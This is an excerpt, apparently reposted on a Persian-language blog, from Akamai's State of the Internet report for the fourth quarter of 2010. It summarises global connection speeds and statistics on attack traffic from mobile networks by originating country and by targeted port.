In the fourth quarter of 2010, the global average connection speed remained essentially flat as compared to the third quarter, ending the year approximately 60 Kbps shy of the 2 Mbps “broadband” threshold. However, as shown in Figure 5, average connection speeds among the top 10 countries were not as static, with quarterly growth as high as 14% (in Belgium), though declines were not as significant, with South Korea’s 3.0% quarterly decline the worst of the three countries in the list that lost ground. Even with these declines, all of the countries within the top 10, as well as the United States, maintained average connection speeds that exceeded the “high broadband” threshold of 5 Mbps.
Attack Traffic From Mobile Networks, Top Originating Countries
In looking at attack traffic from known mobile network providers observed by Akamai during the fourth quarter of 2010, we see that the list of top countries responsible for the attacks remained fairly consistent quarter-over-quarter.
Nine of the top 10 countries, as shown in Figure 19, are the same as in the third quarter – Brazil dropped out of the top 10 list, while Hungary joined it. Italy remained the source of the largest amount of observed attack traffic, up nearly 7% from the third quarter. Of the top 10 countries, the United Kingdom was the only country that saw their percentage drop quarter-over-quarter. Overall attack traffic concentration remained fairly consistent from the prior quarter, with the top two countries responsible for 40% of observed attacks, while the top 10 countries were the source of three-quarters of observed attacks.

Attack Traffic From Mobile Networks, Top Ports
In the fourth quarter of 2010, nine of the top 10 ports targeted by attack traffic coming from mobile networks were the same as in the third quarter. The lone difference was the appearance of Port 3389 (Microsoft Terminal Services), which replaced Port 6882 (BitTorrent) at the bottom of the list. (And in the third quarter, BitTorrent itself replaced Symantec System Center at the bottom of the list.) As shown in Figure 20, attack concentration grew very slightly in the fourth quarter, with Port 445 responsible for 76% of observed attacks (up from 75% last quarter), and the top 10 ports accounting for almost 96% of observed attacks (up just over 1% from last quarter).
The State of the Internet, 4rd Quarter, 2010 Report (Akamai_state_of_internet_q42010.pdf)
27 اردیبهشت 1390 برچسب‌ها: گزارشات تحلیلی
صفحات: «« « ... 46 47 48 49 50